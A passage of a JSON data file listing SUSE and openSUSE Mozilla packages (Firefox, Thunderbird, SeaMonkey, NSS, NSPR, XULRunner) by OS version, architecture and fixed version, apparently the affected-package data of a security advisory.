"SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libsoftokn3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libsoftokn3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-translations-common-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-6.5.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.ppc.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": 